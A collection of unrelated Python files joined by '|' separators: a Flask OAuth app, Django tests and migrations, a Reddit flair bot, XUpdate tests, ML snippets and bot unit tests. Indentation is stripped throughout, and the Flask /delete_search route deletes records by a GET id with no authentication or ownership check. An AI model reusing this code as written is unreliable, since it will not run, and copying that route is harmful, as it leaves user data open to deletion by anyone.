userinfo_endpoint = google_provider_cfg["userinfo_endpoint"]
uri, headers, body = client.add_token(userinfo_endpoint)
userinfo_response = requests.get(uri, headers=headers, data=body)
# We want to make sure their email is verified.
# The user authenticated with Google, authorized our
# app, and now we've verified their email through Google!
if userinfo_response.json().get("email_verified"):
unique_id = userinfo_response.json()["sub"]
users_email = userinfo_response.json()["email"]
picture = userinfo_response.json()["picture"]
users_name = userinfo_response.json()["given_name"]
else:
return "User email not available or not verified by Google.", 400
# Create a user in our db with the information provided
# by Google
user = User(
id_=unique_id, name=users_name, email=users_email, profile_pic=picture
)
# Doesn't exist? Add to database
if not User.get(unique_id):
User.create(unique_id, users_name, users_email, picture)
# Begin user session by logging the user in
login_user(user)
# Send user back to homepage
return redirect(url_for("index"))
@app.route("/logout")
@login_required
def logout():
logout_user()
session.clear()
return redirect(url_for("index"))
@app.route("/delete_search")
def delete_search():
delete_search_query = """
DELETE FROM search
WHERE id=?
"""
id = request.args.get("id")
with create_connection() as conn:
conn.cursor().execute(delete_search_query, [id])
return redirect(url_for("index"))
@app.route("/about", methods=["POST", "GET"])
def about():
return render_template("about.html")
@app.route("/search_entry", methods=["POST", "GET"])
def search_entry():
load_user()
if request.method == "POST":
with create_connection() as conn:
conn.cursor().execute(f"""
INSERT INTO search (user_id, career_page, company, keywords, date_added) VALUES (?, ?, ?, ?, ?)
""", [session.get('user_id'), request.form.get('career_page'), get_company_name(request.form.get('career_page')), request.form.get('keywords').title(), datetime.datetime.now().date()])
return redirect(url_for("index"))
@app.route("/user_account", methods=["POST", "GET"])
def user_account():
load_user()
return render_template("user_account.html")
@app.route("/terminate_account", methods=["POST", "GET"])
def terminate_account():
load_user()
if request.args.get('confirmed'):
update_account_type_query = (
"UPDATE users SET account_type = '' WHERE id = ?"
)
with create_connection() as conn:
conn.cursor().execute(update_account_type_query, [session.get('user_id')])
session.clear()
return redirect(url_for("index"))
return render_template("terminate_account.html")
if __name__ == "__main__":
app.run(debug=True, ssl_context="adhoc")
|
from rest_framework import status
from django.urls import reverse
from rest_framework.test import APITestCase, APIRequestFactory
from api.models import *
from django.contrib.auth import get_user_model
from api.serializers import *
User = get_user_model()
# Helper Function
def create_nomaluser():
return User.objects.create_user('test', 'test@test.com','12345678')
def create_superuser():
return User.objects.create_superuser('admin', 'admin@admin.com', '12345678')
# Create your tests here.
class UserTestCase(APITestCase):
def test_list(self):
url = reverse('user-list')
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_create(self):
url = reverse('user-list')
user = dict()
user['username'] = 'test'
user['password'] = '12345678'
user['first_name'] = 'test_first_name'
user['last_name'] = 'test_last_name'
user['email'] = 'test@test.com'
user['address'] = 'test_address'
user['student_id'] = '0416031'
user['birthday'] = '2016-04-25'
user['phone_number'] = '0919610611'
response = self.client.post(url, user)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(User.objects.count(), 1)
self.assertEqual(User.objects.get(pk=1).username, 'test')
def test_login_and_token(self):
create_nomaluser()
url = reverse('user-login')
user = dict()
user['username'] = 'test'
user['password'] = '12345678'
response = self.client.post(url, user)
self.assertEqual(User.objects.count(), 1)
self.assertEqual(response.status_code, status.HTTP_200_OK)
data = dict()
data['token'] = response.data['token']
verify_url = reverse('verify-token')
response = self.client.post(verify_url, data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
refresh_url = reverse('refresh-token')
response = self.client.post(refresh_url, data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
class BookTestCase(APITestCase):
def create_book(self):
book = dict()
book['title'] = 'title'
book['author'] = 'author'
book['ISBN'] = '132456778'
book['publisher'] = 'Leo'
book['call_number'] = '1A2B'
barcodes = []
barcode_1 = dict()
barcode_1['bar_code'] = '1234'
barcode_2 = dict()
barcode_2['bar_code'] = '5678'
barcodes.append(barcode_1)
barcodes.append(barcode_2)
book['bar_codes'] = barcodes
serializer = BookSerializer(data=book)
serializer.is_valid()
data = serializer.validated_data
return BookSerializer.create(self, data)
def setUp(self):
self.superuser = create_superuser()
self.normaluser = create_nomaluser()
def test_create(self):
url = reverse('book-list')
book = dict()
book['title'] = 'title'
book['author'] = 'author'
book['ISBN'] = '132456778'
book['publisher'] = 'Leo'
book['call_number'] = '1A2B'
barcodes = []
barcode_1 = dict()
barcode_1['bar_code'] = '1234'
barcode_2 = dict()
barcode_2['bar_code'] = '5678'
barcodes.append(barcode_1)
barcodes.append(barcode_2)
book['bar_codes'] = barcodes
self.client.force_login(user=self.normaluser)
response = self.client.patch(url, book)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.client.force_login(user=self.superuser)
response = self.client.post(url, book)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
book = Book.objects.get()
self.assertEqual(book.bar_codes.count(), 2)
barcode_1 = book.bar_codes.get(id=1)
barcode_2 = book.bar_codes.get(id=2)
self.assertEqual(barcode_1.bar_code, '1234')
self.assertEqual(barcode_1.book_id, book.id)
self.assertEqual(barcode_2.bar_code, '5678')
self.assertEqual(barcode_2.book_id, book.id)
def test_list(self):
url = reverse('book-list')
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_update(self):
old_book = self.create_book()
url = reverse('book-detail', kwargs={'id': old_book.id})
new_book = dict()
new_book['title'] = 'title2'
self.client.force_login(user=self.normaluser)
response = self.client.patch(url, new_book)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.client.force_login(user=self.superuser)
response = self.client.patch(url, new_book)
self.assertEqual(response.status_code, status.HTTP_200_OK)
updated_book = Book.objects.get(id=old_book.id)
self.assertEqual(updated_book.title, 'title2')
|
import re
from bs4 import BeautifulSoup
from datetime import datetime
import httplib
import praw
import os
if os.path.exists('settings.py'):
import settings
def GetPraw():
return praw.Reddit(client_id = settings.client_id,
client_secret = settings.client_secret,
username = settings.reddituser,
password = settings.redditpass,
user_agent = 'r/allthingszerg replay flair script')
def FindRedditName(events):
for event in events:
if (event['_event'] == 'NNet.Game.SChatMessage'):
matches = re.search('reddit *name[ :]*([A-z0-9]+)',event['m_string'].lower())
if matches != None:
return matches.group(1)
return False
def RegionNameFromId(regionId):
if regionId == 1:
return "AM"
if regionId == 2:
return "EU"
if regionId == 3:
return "KR"
if regionId == 6:
return "SEA"
return None
def isflairbotmessage(message):
return message.subject == "account link replay"
def isMessageBodyValidLink(message):
matches = re.search("drop.sc/replay/([0-9]+)", message.body)
if matches != None:
return 'http://sc2replaystats.com/download/' + matches.group(1)
matches = re.search("(ggtracker.com/matches/[0-9]+)(/replay|)", message.body)
if matches != None:
return 'http://' + matches.group(1) + '/replay'
return False
def bnetGet(region, url):
conn = httplib.HTTPConnection(region + '.battle.net')
conn.connect()
request = conn.putrequest('GET', url)
conn.endheaders()
conn.send('')
resp = conn.getresponse()
return resp.read()
def getLeagueFromSource(source):
soup = BeautifulSoup(source, "html.parser")
if (len(soup.select(".error-header")) > 0):
return u'banned'
try:
return soup.select(".badge-item")[0].select("span.badge")[0]['class'][1][6:]
except:
open("last.failure.txt", "w").write(source)
raise
def getLeague(region, url):
source = bnetGet(region[0], "/sc2/"+region[1]+"/profile/"+url)
leaguename = getLeagueFromSource(source)
return (leaguename, str(datetime.now().year), str(datetime.now().month), str(datetime.now().day))
def readAccountsFile(fileName):
def readAccountsFileLine(line):
matches = re.search("([^,]+),([^,]+),([^,]+),", line)
return {
'bnet': matches.group(1),
'redditName': matches.group(2),
'region': matches.group(3)
}
lines = open(fileName, "r").readlines()
return map(readAccountsFileLine, lines)
def messageReply(message, text):
print "sending message:" + text
message.reply(text)
message.mark_read()
def stripOutClan(text):
return re.search("(" +
"(?:\[|<|<)" +
"[^\[\]<>]+" +
"(?:\]|>|>)" +
"<sp/>" +
")?" +
"(.+)", text).group(2)
def updateUserFlair(subReddit, redditName, bNetName, regionName, leagueData):
newFlairText = leagueData[0].title() + " " + regionName + " " + leagueData[1] + "-" + leagueData[2] + "-" + leagueData[3]
subReddit.flair.set(redditName, bNetName, newFlairText)
|
# Generated by Django 3.2 on 2022-03-13 20:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('media', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='media',
name='image_url',
field=models.URLField(blank=True, max_length=1024, null=True),
),
]
|
from onnx_runner_generator import generate_onnx_runner
operators = {}
operators['Sigmoid'] = {
'inputs':'[np.array([1, 2, 3]).astype(np.float32)]'
}
operators['BitShift'] = {
'inputs':'[np.random.randn((2,3,4)),np.random.randn((2,3,4))]'
}
for operator, operator_info in operators.items():
generate_onnx_runner(operator, operator_info['inputs'])
|
#!/usr/bin/env python
import unittest
import cStringIO
from amara.lib import testsupport, inputsource
from amara.xupdate import reader, XUpdateError, apply_xupdate
class test_xupdate(unittest.TestCase):
class __metaclass__(type):
def __init__(cls, name, bases, members):
if '__metaclass__' not in members:
test_method = cls.new_test_method()
setattr(cls, 'runTest', test_method)
return
def new_test_method(cls):
def test_method(self):
source = inputsource(self.source, 'source')
xupdate = inputsource(self.xupdate, 'xupdate-source')
document = apply_xupdate(source, xupdate)
return
return test_method
# this first test is from the spec
# (http://www.xmldb.org/xupdate/xupdate-wd.html)
# "Example of Usage" section
class test_spec_1(test_xupdate):
source = """<?xml version="1.0"?>
<addresses version="1.0">
<address id="1">
<fullname>Andreas Laux</fullname>
<born day='1' month='12' year='1978'/>
<town>Leipzig</town>
<country>Germany</country>
</address>
</addresses>
"""
xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:insert-after select="/addresses/address[1]" >
<xupdate:element name="address">
<xupdate:attribute name="id">2</xupdate:attribute>
<fullname>Lars Martin</fullname>
<born day='2' month='12' year='1974'/>
<town>Leizig</town>
<country>Germany</country>
</xupdate:element>
</xupdate:insert-after>
</xupdate:modifications>
"""
expected = """<?xml version='1.0' encoding='UTF-8'?>
<addresses version='1.0'>
<address id='1'>
<fullname>Andreas Laux</fullname>
<born day='1' month='12' year='1978'/>
<town>Leipzig</town>
<country>Germany</country>
</address><address id='2'><fullname>Lars Martin</fullname><born day='2' month='12' year='1974'/><town>Leizig</town><country>Germany</country></address>
</addresses>"""
class test_append(test_xupdate):
source = """<?xml version="1.0"?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
</addresses>
"""
xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:append select="/addresses" child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:append>
</xupdate:modifications>
"""
expected = """<?xml version='1.0' encoding='UTF-8'?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
<address><town>San Francisco</town></address></addresses>"""
class test_update(test_xupdate):
source = """<?xml version="1.0"?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
<address>
<town>San Francisco</town>
</address>
</addresses>
"""
xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:update select="/addresses/address[2]/town">
New York
</xupdate:update>
</xupdate:modifications>
"""
expected = """<?xml version='1.0' encoding='UTF-8'?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
<address>
<town>
New York
</town>
</address>
</addresses>"""
class test_remove(test_xupdate):
source = """<?xml version="1.0"?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
<address>
<town>San Francisco</town>
</address>
</addresses>
"""
xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:remove select="/addresses/address[1]"/>
</xupdate:modifications>
"""
expected = """<?xml version='1.0' encoding='UTF-8'?>
<addresses>
__
<address>
<town>San Francisco</town>
</address>
</addresses>""".replace('_', ' ')
class test_attribute_append(test_xupdate):
source = """<ftss:Container xmlns:ftss="http://xmlns.4suite.org/reserved">
<ftss:Children/>
</ftss:Container>"""
xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
xmlns:ftss="http://xmlns.4suite.org/reserved"
xmlns:xlink="http://www.w3.org/1999/xlink"
>
<xupdate:variable name='child-name'>FOO</xupdate:variable>
<xupdate:append select="(ftss:Repository | ftss:Container)/ftss:Children"
child="last()">
<ftss:ChildReference xlink:type="simple" xlink:actuate="onLoad" xlink:show="embed">
<xupdate:attribute name='xlink:href'>
<xupdate:value-of select='concat($child-name,";metadata")'/>
</xupdate:attribute>
</ftss:ChildReference>
</xupdate:append>
</xupdate:modifications>
"""
expected = """<?xml version='1.0' encoding='UTF-8'?>
<ftss:Container xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ftss='http://xmlns.4suite.org/reserved'>\n <ftss:Children><ftss:ChildReference xlink:href='FOO;metadata' xlink:type='simple' xlink:actuate='onLoad' xlink:show='embed'/></ftss:Children>\n</ftss:Container>"""
class test_spec_2(test_xupdate):
source = """<?xml version="1.0" encoding="utf-8"?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
</addresses>
"""
xupdate = """<?xml version="1.0" encoding="utf-8"?>
<xupdate:modifications version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:append select="/addresses" child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:append>
</xupdate:modifications>
"""
expected = """<?xml version="1.0" encoding="UTF-8"?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
<address><town>San Francisco</town></address></addresses>
"""
# The following was posted on SourceForge as bug #704627
# (attributes were not being appended properly)
class test_attribute_append_2(test_xupdate):
source = """<?xml version='1.0'?>
<test><t id='t1'>one</t><t id='t2'>two</t></test>
"""
xupdate = """<?xml version="1.0"?>
<xu:modifications version="1.0" xmlns:xu="http://www.xmldb.org/xupdate">
<xu:append select="/test"><xu:attribute name="a1">a1v</xu:attribute></xu:append>
</xu:modifications>
"""
expected = """<?xml version="1.0" encoding="UTF-8"?>
<test a1="a1v"><t id="t1">one</t><t id="t2">two</t></test>"""
class test_usecase(test_xupdate):
source = """<?xml version="1.0" encoding="UTF-8"?>
<addresses>
<address id="1">
<!--This is the users name-->
<name>
<first>John</first>
<last>Smith</last>
</name>
<city>Houston</city>
<state>Texas</state>
<country>United States</country>
<phone type="home">333-300-0300</phone>
<phone type="work">333-500-9080</phone>
<note><![CDATA[This is a new user]]></note>
</address>
</addresses>"""
xupdate = """<?xml version="1.0" encoding="UTF-8"?>
<xupdate:modifications version="1.0" xmlns:xupdate="http://www.xmldb.org/xupdate">
<xupdate:append select="/addresses/address[@id = 1]/phone[@type='work']">
<xupdate:attribute name="extension">223</xupdate:attribute>
</xupdate:append>
</xupdate:modifications>"""
expected = """<?xml version="1.0" encoding="UTF-8"?>
<addresses>
<address id="1">
<!--This is the users name-->
<name>
<first>John</first>
<last>Smith</last>
</name>
<city>Houston</city>
<state>Texas</state>
<country>United States</country>
<phone type="home">333-300-0300</phone>
<phone type="work" extension="223">333-500-9080</phone>
<note><![CDATA[This is a new user]]></note>
</address>
</addresses>"""
# rename tests based partly on SF bug #704627 and
# http://lists.fourthought.com/pipermail/4suite/2002-November/004602.html
#
class test_rename(test_xupdate):
source = """<?xml version="1.0" encoding="utf-8"?>
<addresses version="1.0">
<address id="1">
<fullname>Andreas Laux</fullname>
<born day="1" month="12" year="1978"/>
<town>Leipzig</town>
<country>Germany</country>
</address>
<address id="2">
<fullname>Heiko Smit</fullname>
<born day="4" month="8" year="1970"/>
<town>Berlin</town>
<country>Germany</country>
</address>
<address id="3">
<fullname>Vincent Q. Lu</fullname>
<born day="9" month="9" year="1990"/>
<town>Hong Kong</town>
<country>China</country>
</address>
<address id="4">
<fullname>Michelle Lambert</fullname>
<born day="10" month="10" year="1958"/>
<town>Toronto</town>
<country>Canada</country>
</address>
</addresses>"""
xupdate = """<?xml version="1.0" encoding="UTF-8"?>
<xupdate:modifications version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
xmlns:my="urn:bogus:myns">
<!-- rename of an element -->
<xupdate:rename select="/addresses/address[@id='1']/town">city</xupdate:rename>
<!-- rename of an attribute -->
<xupdate:rename select="/addresses/address[@id='1']/born/@year">annum</xupdate:rename>
<!-- rename of document element -->
<xupdate:rename select="/addresses">info</xupdate:rename>
<!-- rename of multiple elements -->
<xupdate:rename select="/*/address">data</xupdate:rename>
<!-- rename of multiple attributes (1 per element) -->
<xupdate:rename select="/*/*/@id[. > 1 and . < 4]">num</xupdate:rename>
<!-- rename of multiple attributes (all in same element) -->
<xupdate:rename select="/*/*[@id='4']/born/@*[name()='day' or name()='month']">zzz</xupdate:rename>
<!-- rename of renamed element -->
<xupdate:rename select="/info">my:info</xupdate:rename>
<!-- insert/append and rename of multiple elements -->
<xupdate:insert-before select="/*/*[1]/born"><xupdate:element name="new-elem"/></xupdate:insert-before>
<xupdate:insert-before select="/*/*[2]/born"><xupdate:element name="new-elem"/></xupdate:insert-before>
<xupdate:insert-before select="/*/*[3]/born"><xupdate:element name="new-elem"/></xupdate:insert-before>
<xupdate:insert-before select="/*/*[4]/born"><xupdate:element name="new-elem"/></xupdate:insert-before>
<xupdate:rename select="/*/*/new-elem">my:new-elem</xupdate:rename>
<xupdate:append select="/*/*" child="last()"><my:another-elem/></xupdate:append>
<xupdate:rename select="/*/*/my:another-elem">my:other-elem</xupdate:rename>
<xupdate:insert-after select="/*/*/my:other-elem"><xupdate:element name="my:foo"/></xupdate:insert-after>
</xupdate:modifications>
"""
expected = """<?xml version="1.0" encoding="UTF-8"?>
<my:info xmlns:my="urn:bogus:myns" version="1.0">
<data id="1">
<fullname>Andreas Laux</fullname>
<my:new-elem/><born day="1" month="12" annum="1978"/>
<city>Leipzig</city>
<country>Germany</country>
<my:other-elem/><my:foo/></data>
<data num="2">
<fullname>Heiko Smit</fullname>
<my:new-elem/><born day="4" month="8" year="1970"/>
<town>Berlin</town>
<country>Germany</country>
<my:other-elem/><my:foo/></data>
<data num="3">
<fullname>Vincent Q. Lu</fullname>
<my:new-elem/><born day="9" month="9" year="1990"/>
<town>Hong Kong</town>
<country>China</country>
<my:other-elem/><my:foo/></data>
<data id="4">
<fullname>Michelle Lambert</fullname>
<my:new-elem/><born zzz="10" year="1958"/>
<town>Toronto</town>
<country>Canada</country>
<my:other-elem/><my:foo/></data>
</my:info>
"""
#-----------------------------------------------------------------------
class test_xupdate_error(unittest.TestCase):
# trick __metaclass__ into not treating this as a test-case
class __metaclass__(type):
def __init__(cls, name, bases, members):
if '__metaclass__' not in members:
test_method = cls.new_test_method()
setattr(cls, 'runTest', test_method)
return
@classmethod
def new_test_method(cls):
def format_error(error_code):
for name, value in XUpdateError.__dict__.iteritems():
if value == error_code:
error_code = 'XUpdateError.' + name
break
return 'XUpdateError(%s)' % error_code
def test_method(self):
source = inputsource(self.source, 'source')
xupdate = inputsource(self.xupdate, 'xupdate-error-source')
expected = format_error(self.error_code)
try:
document = apply_xupdate(source, xupdate)
except XUpdateError, error:
compared = format_error(error.code)
self.assertEquals(expected, compared)
else:
self.fail('%s not raised' % expected)
return
return test_method
source = """<?xml version="1.0"?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
</addresses>
"""
class test_version_missing(test_xupdate_error):
xupdate = """<?xml version="1.0"?>
<xupdate:modifications
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:append select="/addresses" child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:append>
</xupdate:modifications>
"""
error_code = XUpdateError.MISSING_REQUIRED_ATTRIBUTE
class test_select_missing(test_xupdate_error):
xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:append child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:append>
</xupdate:modifications>
"""
error_code = XUpdateError.MISSING_REQUIRED_ATTRIBUTE
class test_select_invalid(test_xupdate_error):
xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:append select="/.." child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:append>
</xupdate:modifications>
"""
error_code = XUpdateError.INVALID_SELECT
class test_syntax_error(test_xupdate_error):
xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:append select="!/addresses" child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:append>
</xupdate:modifications>
"""
error_code = XUpdateError.SYNTAX_ERROR
class test_test_missing(test_xupdate_error):
xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:if>
<xupdate:append select="/addresses" child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:append>
</xupdate:if>
</xupdate:modifications>
"""
error_code = XUpdateError.MISSING_REQUIRED_ATTRIBUTE
class test_illegal_element(test_xupdate_error):
xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:prepend select="/addresses" child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:prepend>
</xupdate:modifications>
"""
error_code = XUpdateError.ILLEGAL_ELEMENT
if __name__ == '__main__':
testsupport.test_main()
|
from typing import Union
import torch
from torch import nn, Tensor
from byol.utils import mlp
class EncoderWrapper(nn.Module):
def __init__(
self,
model: nn.Module,
projection_size: int = 256,
hidden_size: int = 4096,
layer: Union[str, int] = -2,
):
super().__init__()
self.model = model
self.projection_size = projection_size
self.hidden_size = hidden_size
self.layer = layer
self._projector = None
self._projector_dim = None
self._encoded = torch.empty(0)
self._register_hook()
@property
def projector(self):
if self._projector is None:
self._projector = mlp(
self._projector_dim, self.projection_size, self.hidden_size
)
return self._projector
def _hook(self, _, __, output):
output = output.flatten(start_dim=1)
if self._projector_dim is None:
self._projector_dim = output.shape[-1]
self._encoded = self.projector(output)
def _register_hook(self):
if isinstance(self.layer, str):
layer = dict([*self.model.named_modules()])[self.layer]
else:
layer = list(self.model.children())[self.layer]
layer.register_forward_hook(self._hook)
def forward(self, x: Tensor) -> Tensor:
_ = self.model(x)
return self._encoded
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2017-05-15 06:40
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('proso_models', '0001_initial'),
]
operations = [
migrations.AlterIndexTogether(
name='audit',
index_together=set([]),
),
migrations.RemoveField(
model_name='audit',
name='answer',
),
migrations.RemoveField(
model_name='audit',
name='info',
),
migrations.RemoveField(
model_name='audit',
name='item_primary',
),
migrations.RemoveField(
model_name='audit',
name='item_secondary',
),
migrations.RemoveField(
model_name='audit',
name='user',
),
migrations.RemoveField(
model_name='variable',
name='audit',
),
migrations.DeleteModel(
name='Audit',
),
]
|
# -*- coding: utf-8 -*-
import asyncio
import functools
import os
import sys
#------------------------------------------------------------------------------
root = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(root)
#------------------------------------------------------------------------------
import ccxt.async as ccxt # noqa: E402
#------------------------------------------------------------------------------
async def print_ticker(symbol, id):
# verbose mode will show the order of execution to verify concurrency
exchange = getattr(ccxt, id)({'verbose': True})
print(await exchange.fetch_ticker(symbol))
#------------------------------------------------------------------------------
if __name__ == '__main__':
symbol = 'ETH/BTC'
print_ethbtc_ticker = functools.partial(print_ticker, symbol)
[asyncio.ensure_future(print_ethbtc_ticker(id)) for id in [
'bitfinex',
'poloniex',
'kraken',
'gdax',
'bittrex',
'hitbtc',
]]
pending = asyncio.Task.all_tasks()
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.gather(*pending))
|
# Generated by Django 3.1.3 on 2020-12-19 18:26
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('inventario', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ClienteModel',
fields=[
('clienteId', models.AutoField(db_column='cli_id', primary_key=True, serialize=False, unique=True)),
('clienteNombre', models.CharField(db_column='cli_nom', max_length=45)),
('clienteApellido', models.CharField(db_column='cli_ape', max_length=45)),
('clienteEmail', models.EmailField(db_column='cli_email', max_length=25, null=True, unique=True)),
('clienteInicio', models.DateField(db_column='cli_desde', default=django.utils.timezone.now)),
('clienteFono', models.CharField(db_column='cli_fono', max_length=10)),
('createdAt', models.DateTimeField(auto_now_add=True)),
('updatedAt', models.DateTimeField(auto_now=True)),
],
options={
'verbose_name': 'Cliente',
'verbose_name_plural': 'Clientes',
'db_table': 't_cliente',
'ordering': ['clienteInicio', 'clienteNombre'],
},
),
migrations.CreateModel(
name='MascotaModel',
fields=[
('mascotaId', models.AutoField(db_column='mascota_id', primary_key=True, serialize=False, unique=True)),
('mascotaNombre', models.CharField(db_column='mascota_nomb', max_length=45)),
('mascotaFechaNacimiento', models.DateTimeField(db_column='mascota_fecnac')),
('clienteId', models.ForeignKey(db_column='cli_id', on_delete=django.db.models.deletion.PROTECT, related_name='clienteMascotas', to='clientes.clientemodel')),
('razaId', models.ForeignKey(db_column='raza_id', on_delete=django.db.models.deletion.PROTECT, related_name='razaMascotas', to='inventario.razamodel')),
],
options={
'verbose_name': 'Mascota',
'verbose_name_plural': 'Mascotas',
'db_table': 't_mascota',
},
),
]
|
import numpy as np
# Setting the random seed, feel free to change it and see different solutions.
np.random.seed(42)
def stepFunction(t):
if t >= 0:
return 1
return 0
def prediction(X, W, b):
return stepFunction((np.matmul(X, W) + b)[0])
# TODO: Fill in the code below to implement the perceptron trick.
# The function should receive as inputs the data X, the labels y,
# the weights W (as an array), and the bias b,
# update the weights and bias W, b, according to the perceptron algorithm,
# and return W and b.
def perceptronStep(X, y, W, b, learn_rate=0.01):
for i in range(len(X)): # loop through dataset
y_hat = prediction(X[i], W, b) # predicting the value for a given data
if y[i] - y_hat == 1: # the point is classified positively
W[0] += X[i][0] * learn_rate # updating value
W[1] += X[i][1] * learn_rate # update value
b += learn_rate # increasing the rate
elif y[i] - y_hat == -1: # the point is classified negatively
W[0] -= X[i][0] * learn_rate
W[1] -= X[i][1] * learn_rate
b -= learn_rate
return W, b
# This function runs the perceptron algorithm repeatedly on the dataset,
# and returns a few of the boundary lines obtained in the iterations,
# for plotting purposes.
# Feel free to play with the learning rate and the num_epochs,
# and see your results plotted below.
def trainPerceptronAlgorithm(X, y, learn_rate=0.01, num_epochs=25):
x_min, x_max = min(X.T[0]), max(X.T[0])
y_min, y_max = min(X.T[1]), max(X.T[1])
W = np.array(np.random.rand(2, 1))
b = np.random.rand(1)[0] + x_max
# These are the solution lines that get plotted below.
boundary_lines = []
for i in range(num_epochs):
# In each epoch, we apply the perceptron step.
W, b = perceptronStep(X, y, W, b, learn_rate)
boundary_lines.append((-W[0] / W[1], -b / W[1]))
return boundary_lines
|
# Generated by Django 2.2.1 on 2019-10-25 11:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('digi', '0023_themeindexpage_guides_and_support_header'),
]
operations = [
migrations.AlterField(
model_name='projectpage',
name='phase',
field=models.CharField(blank=True, choices=[('', 'No phase'), ('PR', 'Valmistelu'), ('EX', 'Kokeilu'), ('EN', 'Käytössä')], default='', max_length=2, null=True),
),
]
|
from setuptools import setup, find_packages
# Go!
setup(
# Module name
name='pkpd',
version='0.0.1dev0',
# License name
license='BSD 3-clause license',
# Maintainer information
maintainer='David Augustin',
maintainer_email='david.augustin@dtc.ox.ac.uk',
# Packages and data to include
packages=find_packages(include=('pkpd', 'pkpd.*')),
include_package_data=True,
# List of dependencies
install_requires=[
'jupyter==1.0.0',
'myokit>=1.31',
'numpy>=1.8',
'pandas>=0.24',
'pints>=0.3',
'plotly==4.8.1',
'tqdm==4.46.1'
],
)
|
import unittest
from bot_top_ranking import handlers
from bot_top_ranking.utils import state, bot
from bot_top_ranking.help_functions import create_top
from unittests.conf import (
call,
message,
chat,
mock_upload_song,
user,
mock_send_message,
mock_pin_chat_message,
get_capture,
mock_state_init,
mock_unpin_chat_message,
mock_promote_chat_member,
mock_set_chat_administrator_custom_title,
mock_send_audio,
mock_download_music_link,
get_songs,
mock_promote_chat_member_raise,
mocK_get_chat_administrators
)
from unittest.mock import patch
from dotenv import load_dotenv
load_dotenv()
class TestHandlers(unittest.TestCase):
def setUp(self):
self.User = user()
self.Chat = chat()
self.Message = message(self.User,self.Chat)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_get_help(self, mock_message):
handlers.get_help(self.Message)
capture = get_capture()
expected_output = (
"<b>Admin commands</b>\n"
"/disco to start poll\n"
"/poptop [num] output referenced song (e.g. /poptop or /poptop 5)\n"
"/finish to end poll\n"
"/setDJ [mentioned user] set mentioned people a DJ (e.g. /setDJ @Admin)\n"
"/settings_mp3 on|off (e.g. /settings_mp3 or /settings_mp3 on)\n"
"/poll_status to print status of poll in this chat\n"
"<b>User commands</b>\n"
"/top [num] output top songs(e.g. /top 5)\n"
"/vote [num] vote for song from poll (e.g. /vote 5)\n"
)
self.assertEqual(capture,expected_output)
@patch('bot_top_ranking.handlers.bot.send_message', side_effect=mock_send_message)
def test_callback_query(self, mock_message):
Call = call(self.User,"help",self.Chat,self.Message)
self.assertIsNone(handlers.callback_query(Call))
capture = get_capture()
expected_output = (
"<b>Admin commands</b>\n"
"/disco to start poll\n"
"/poptop [num] output referenced song (e.g. /poptop or /poptop 5)\n"
"/finish to end poll\n"
